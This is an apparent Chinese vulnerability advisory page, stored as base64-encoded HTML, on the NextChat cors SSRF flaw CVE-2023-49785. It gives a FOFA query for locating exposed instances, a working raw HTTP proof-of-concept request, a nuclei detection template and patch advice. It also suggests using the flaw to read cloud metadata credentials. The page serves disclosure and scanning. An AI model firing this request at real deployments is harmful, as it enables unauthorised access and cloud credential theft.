NextChat cors SSRF漏洞 （CVE-2023-49785）

PGgxPjxhIG5hbWU9Ik5leHRDaGF0IGNvcnMgU1NSRua8j+a0niDvvIhDVkUtMjAyMy00OTc4Ne+8iSI+PC9hPjxzcGFuPjwvc3Bhbj5OZXh0Q2hhdCBjb3JzIFNTUkbmvI/mtJ4g77yIQ1ZFLTIwMjMtNDk3ODXvvIk8L2gxPjxoMj48YSBuYW1lPSLmvI/mtJ7mj4/ov7AiPjwvYT48c3Bhbj48L3NwYW4+5ryP5rSe5o+P6L+wPC9oMj48cD5OZXh0Q2hhdCDmmK/kuIDkuKrpnaLlkJHnlKjmiLfnmoRHUFTnsbvlupTnlKjnqIvluo/vvIznlKjmiLflj6/ku6XpgJrov4fov5nkuKrnqIvluo/kuI5HUFTov5vooYzkuqTkupLjgIIyMDI05bm0M+aciO+8jOS6kuiBlOe9keS4iuaKq+mcskNWRS0yMDIzLTQ5Nzg1IE5leHRDaGF0IGNvcnMgU1NSRiDmvI/mtJ7vvIzmlLvlh7vogIXlj6/lnKjml6DpnIDnmbvpmYbnmoTmg4XlhrXkuIvmnoTpgKDmgbbmhI/or7fmsYLpgKDmiJBTU1JG77yM6YCg5oiQ5pWP5oSf5L+h5oGv5rOE5ryP562J44CCPC9wPgo8cD50aXBzOue7k+WQiOS6keS4u+acuueahOeJueeCue+8jOWPr+mAmui/h3Nzcmborr/pl67kupHkuLvmnLrlhYPmlbDmja7vvIzkvovlpoLor7vlj5ZBSy9TS++8jOWunueOsOS6keS4u+acuuaOpeeuoeOAgjwvcD4KPGgyPjxhIG5hbWU9IuS6p+WTgeeVjOmdoiI+PC9hPjxzcGFuPjwvc3Bhbj7kuqflk4HnlYzpnaI8L2gyPjxwPjxpbWcgc3JjPSJodHRwczovL25jMC5jZG4uemthcS5jbi9tZC8yMTIxMi80OGUyZDczYmZlYjM0ZTU3ZjY4MGM2YzhkMjlhYjRhYl8yNTQwNS5wbmciIGFsdD0iIj48L3A+CjxoMj48YSBuYW1lPSJmb2Zh6K+t5rOVIj48L2E+PHNwYW4+PC9zcGFuPmZvZmHor63ms5U8L2gyPjxwPjxjb2RlPnRpdGxlPSJOZXh0Q2hhdCI8L2NvZGU+PC9wPgo8aDI+PGEgbmFtZT0iUE9DIj48L2E+PHNwYW4+PC9zcGFuPlBPQzwvaDI+PHByZT48b2w+PGxpPjxjb2RlPjxzcGFuPkdFVCA8L3NwYW4+PHNwYW4+Lzwvc3Bhbj48c3Bhbj5hcGk8L3NwYW4+PHNwYW4+Lzwvc3Bhbj48c3Bhbj5jb3JzPC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+aHR0cHM8L3NwYW4+PHNwYW4+Lzwvc3Bhbj48c3Bhbj53d3c8L3NwYW4+PHNwYW4+Ljwvc3Bhbj48c3Bhbj5iYWlkdTwvc3Bhbj48c3Bhbj4uPC9zcGFuPjxzcGFuPmNvbSBIVFRQPC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+MS4xPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gPC9zcGFuPjxzcGFuPkhvc3Q8L3NwYW4+PHNwYW4+Ojwvc3Bhbj48c3Bhbj4gPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gPC9zcGFuPjxzcGFuPlVzZXI8L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj5BZ2VudDwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+TW96aWxsYTwvc3Bhbj48c3Bhbj4vPC9zcGFuPjxzcGFuPjUuMDwvc3Bhbj48c3Bhbj4gPC9zcGFuPjxzcGFuPig8L3NwYW4+PHNwYW4+V2luZG93czwvc3Bhbj48c3Bhbj4gTlQgPC9zcGFuPjxzcGFuPjYuMTwvc3Bhbj48c3Bhbj47PC9zcGFuPjxzcGFuPiBXT1c2NDwvc3Bhbj48c3Bhbj4pPC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+QXBwbGVXZWJLaXQ8L3NwYW4+PHNwYW4+Lzwvc3Bhbj48c3Bhbj41MzcuMzY8L3NwYW4+PHNwYW4+IDwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+KDwvc3Bhbj48c3Bhbj5LSFRNTDwvc3Bhbj48c3Bhbj4sPC9zcGFuPjxzcGFuPiBsaWtlIDwvc3Bhbj48c3Bhbj5HZWNrbzwvc3Bhbj48c3Bhbj4pPC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+Q2hyb21lPC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+NDEuMDwvc3Bhbj48c3Bhbj4uPC9zcGFuPjxzcGFuPjIyMjcuMDwvc3Bhbj48c3Bhbj4gPC9zcGFuPjxzcGFuPlNhZmFyaTwvc3Bhbj48c3Bhbj4vPC9zcGFuPjxzcGFuPjUzNy4zNjwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+IDwvc3Bhbj48c3Bhbj5Db25uZWN0aW9uPC9zcGFuPjxzcGFuPjo8L3NwYW4+PHNwYW4+IGNsb3NlPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gPC9zcGFuPjxzcGFuPkFjY2VwdDwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+Kjwvc3Bhbj48c3Bhbj4vKjwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+IEFjY2VwdC1MYW5ndWFnZTogZW48L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiBBY2NlcHQtRW5jb2Rpbmc6IGd6aXA8L3NwYW4+PC9jb2RlPjwvbGk+PC9vbD48L3ByZT48cD48aW1nIHNyYz0iaHR0cHM6Ly9uYzAuY2RuLnprYXEuY24vbWQvMjEyMTIvOGIyOWE1ZmY5ZDM3OTAyODY0YTJiNjkzZDFiMjU1MGJfOTkyMTcucG5nIiBhbHQ9IiI+PC9wPgo8aDI+PGEgbmFtZT0ibnVjbGVp6aqM6K+BIj48L2E+PHNwYW4+PC9zcGFuPm51Y2xlaemqjOivgTwvaDI+PHByZT48b2w+PGxpPjxjb2RlPjxzcGFuPiBpZDwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiBDVkU8L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj4yMDIzPC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+NDk3ODU8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj5pbmZvPC9zcGFuPjxzcGFuPjo8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgbmFtZTwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+TmV4dENoYXQ8L3NwYW4+PHNwYW4+IGNvcnMgU1NSRjwvc3Bhbj48c3Bhbj7mvI/mtJ48L3NwYW4+PHNwYW4+IDwvc3Bhbj48c3Bhbj7vvIg8L3NwYW4+PHNwYW4+Q1ZFPC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+MjAyMzwvc3Bhbj48c3Bhbj4tPC9zcGFuPjxzcGFuPjQ5Nzg1PC9zcGFuPjxzcGFuPu+8iTwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICBhdXRob3I8L3NwYW4+PHNwYW4+Ojwvc3Bhbj48c3Bhbj4gbm9ib2R5PC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gIHNldmVyaXR5PC9zcGFuPjxzcGFuPjo8L3NwYW4+PHNwYW4+IGhpZ2g8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgZGVzY3JpcHRpb248L3NwYW4+PHNwYW4+Ojwvc3Bhbj48c3Bhbj4gPC9zcGFuPjxzcGFuPnw8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICA8L3NwYW4+PHNwYW4+TmV4dENoYXQ8L3NwYW4+PHNwYW4+IDwvc3Bhbj48c3Bhbj7mmK/kuIDkuKrpnaLlkJHnlKjmiLfnmoQ8L3NwYW4+PHNwYW4+R1BUPC9zcGFuPjxzcGFuPuexu+W6lOeUqOeoi+W6j++8jOeUqOaIt+WPr+S7pemAmui/h+i/meS4queoi+W6j+S4jjwvc3Bhbj48c3Bhbj5HUFQ8L3NwYW4+PHNwYW4+6L+b6KGM5Lqk5LqS44CCPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4yMDI0PC9zcGFuPjxzcGFuPuW5tDwvc3Bhbj48c3Bhbj4zPC9zcGFuPjxzcGFuPuaciO+8jOS6kuiBlOe9keS4iuaKq+mcsjwvc3Bhbj48c3Bhbj5DVkU8L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj4yMDIzPC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+NDk3ODU8L3NwYW4+PHNwYW4+IDwvc3Bhbj48c3Bhbj5OZXh0Q2hhdDwvc3Bhbj48c3Bhbj4gY29ycyBTU1JGIDwvc3Bhbj48c3Bhbj7mvI/mtJ7vvIzmlLvlh7vogIXlj6/lnKg8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPuaXoOmcgOeZu+mZhueahOaDheWGteS4i+aehOmAoOaBtuaEj+ivt+axgumAoOaIkDwvc3Bhbj48c3Bhbj5TU1JGPC9zcGFuPjxzcGFuPu+8jOmAoOaIkOaVj+aEn+S/oeaBr+azhOa8j+etieOAgjwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICBpbXBhY3Q8L3NwYW4+PHNwYW4+Ojwvc3Bhbj48c3Bhbj4gPC9zcGFuPjxzcGFuPnw8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICA8L3NwYW4+PHNwYW4+5pS75Ye76ICF5Y+v5Zyo5peg6ZyA55m76ZmG55qE5oOF5Ya15LiL5p6E6YCg5oG25oSP6K+35rGC6YCg5oiQPC9zcGFuPjxzcGFuPlNTUkY8L3NwYW4+PHNwYW4+77yM6YCg5oiQ5pWP5oSf5L+h5oGv5rOE5ryP562JLjwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICByZW1lZGlhdGlvbjwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+fDwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICAgIDwvc3Bhbj48c3Bhbj7ljYfnuqfniYjmnKzvvIzmiZPooaXkuIE8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgbWV0YWRhdGE8L3NwYW4+PHNwYW4+Ojwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICAgIHZlcmlmaWVkPC9zcGFuPjxzcGFuPjo8L3NwYW4+PHNwYW4+IDwvc3Bhbj48c3Bhbj50cnVlPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gICAgbWF4PC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+cmVxdWVzdDwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+Mzwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICAgIGZvZmE8L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj5xdWVyeTwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiB0aXRsZTwvc3Bhbj48c3Bhbj49PC9zcGFuPjxzcGFuPiJOZXh0Q2hhdCI8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgdGFnczwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiBhaTwvc3Bhbj48c3Bhbj4sPC9zcGFuPjxzcGFuPmdwdDwvc3Bhbj48c3Bhbj4sPC9zcGFuPjxzcGFuPm5leHRjaGF0PC9zcGFuPjxzcGFuPiw8L3NwYW4+PHNwYW4+c3NyZjwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPuS/ruWkjeW7uuiurjwvc3Bhbj48c3Bhbj4gPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj7lu7rorq7ljYfnuqfliLDmnIDmlrDniYjmnKzmiJbmiZPooaXkuIE8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPumdnuW/heimgeemgeatouWFrOe9keiuv+mXruaIlueZveWQjeWNleiuv+mXrjwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+cmVxdWVzdHM8L3NwYW4+PHNwYW4+Ojwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICA8L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj4gcmF3PC9zcGFuPjxzcGFuPjo8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICAgIDwvc3Bhbj48c3Bhbj4tPC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+fDwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICAgICAgICBHRVQgPC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+YXBpPC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+Y29yczwvc3Bhbj48c3Bhbj4vPC9zcGFuPjxzcGFuPmh0dHBzPC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+d3d3PC9zcGFuPjxzcGFuPi48L3NwYW4+PHNwYW4+YmFpZHU8L3NwYW4+PHNwYW4+Ljwvc3Bhbj48c3Bhbj5jb20gSFRUUDwvc3Bhbj48c3Bhbj4vPC9zcGFuPjxzcGFuPjEuMTwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICAgICAgICA8L3NwYW4+PHNwYW4+SG9zdDwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+e3s8L3NwYW4+PHNwYW4+SG9zdG5hbWU8L3NwYW4+PHNwYW4+fX08L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICAgICAgPC9zcGFuPjxzcGFuPlVzZXI8L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj5BZ2VudDwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+TW96aWxsYTwvc3Bhbj48c3Bhbj4vPC9zcGFuPjxzcGFuPjUuMDwvc3Bhbj48c3Bhbj4gPC9zcGFuPjxzcGFuPig8L3NwYW4+PHNwYW4+V2luZG93czwvc3Bhbj48c3Bhbj4gTlQgPC9zcGFuPjxzcGFuPjYuMTwvc3Bhbj48c3Bhbj47PC9zcGFuPjxzcGFuPiBXT1c2NDwvc3Bhbj48c3Bhbj4pPC9zcGFuPjxzcGFuPiA8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPkFwcGxlV2ViS2l0PC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+NTM3LjM2PC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+KDwvc3Bhbj48c3Bhbj5LSFRNTDwvc3Bhbj48c3Bhbj4sPC9zcGFuPjxzcGFuPiBsaWtlIDwvc3Bhbj48c3Bhbj5HZWNrbzwvc3Bhbj48c3Bhbj4pPC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+Q2hyb21lPC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+NDEuMDwvc3Bhbj48c3Bhbj4uPC9zcGFuPjxzcGFuPjIyMjcuMDwvc3Bhbj48c3Bhbj4gPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj5TYWZhcmk8L3NwYW4+PHNwYW4+Lzwvc3Bhbj48c3Bhbj41MzcuMzY8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICAgICAgPC9zcGFuPjxzcGFuPkNvbm5lY3Rpb248L3NwYW4+PHNwYW4+Ojwvc3Bhbj48c3Bhbj4gY2xvc2U8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICAgICAgPC9zcGFuPjxzcGFuPkFjY2VwdDwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+Kjwvc3Bhbj48c3Bhbj4vKjwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICAgICAgICBBY2NlcHQtTGFuZ3VhZ2U6IGVuPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gICAgICAgIEFjY2VwdC1FbmNvZGluZzogZ3ppcDwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICBtYXRjaGVyczo8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICAgIC0gdHlwZTogZHNsPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gICAgICAgIGRzbDo8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICAgICAgICAtIHN0YXR1c19jb2RlID09IDIwMCAmYW1wOyZhbXA7IGNvbnRhaW5zX2FsbChib2R5LCLkuqxJQ1Dor4EwMzAxNzM8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPuWPtyIpPC9zcGFuPjwvY29kZT48L2xpPjwvb2w+PC9wcmU+PHA+PGltZyBzcmM9Imh0dHBzOi8vbmMwLmNkbi56a2FxLmNuL21kLzIxMjEyL2NlYzFkNTk4MWFkM2FlYzI3NDAwNWM4ZjEyNjQ3NTBhXzYyNDQxLnBuZyIgYWx0PSIiPjwvcD4KPGgyPjxhIG5hbWU9IuS/ruWkjeW7uuiuriI+PC9hPjxzcGFuPjwvc3Bhbj7kv67lpI3lu7rorq48L2gyPjx1bD4KPGxpPuW7uuiuruWNh+e6p+WIsOacgOaWsOeJiOacrOaIluaJk+ihpeS4gTwvbGk+PGxpPumdnuW/heimgeemgeatouWFrOe9keiuv+mXruaIlueZveWQjeWNleiuv+mXrjwvbGk+PC91bD4=